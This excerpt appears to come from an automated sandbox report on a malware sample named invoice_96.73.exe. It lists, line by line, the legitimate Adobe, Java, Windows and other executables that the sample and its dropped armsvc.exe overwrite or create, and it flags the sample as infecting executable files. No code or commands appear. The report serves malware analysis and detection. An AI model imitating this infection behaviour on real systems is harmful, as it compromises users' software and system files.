      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Infects executable files (exe, dll, sys, html)
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\CCleaner\CCleaner64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehsched.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\ieetwcollector.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\ehome\ehrecvr.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\java.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\dllhost.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
      Source: C:\Users\user\Desktop\invoice_96.73.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\sppsvc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\CCleaner\CCleaner.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to behavior
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\CCleaner\CCleaner64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\ssvagent.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\jabswitch.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\System32\alg.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\rmid.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\ieetwcollector.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\java-rmi.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\javacpl.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\kinit.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\javaw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\ktab.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\tnameserv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\jp2launcher.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\policytool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehrecvr.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\keytool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\java.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\javaws.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\orbd.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\dllhost.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\jjs.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\servertool.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\unpack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXEJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\sppsvc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\CCleaner\CCleaner.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msdtc.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\klist.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\pack200.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Java\jre1.8.0_121\bin\rmiregistry.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\VSSVC.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbengine.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\wbem\WmiApSrv.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\SearchIndexer.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\ehome\ehsched.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\FXSSVC.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exeJump to dropped file
      Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
      Source: C:\Users\user\Desktop\invoice_96.73.exeFile created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exeJump to dropped file
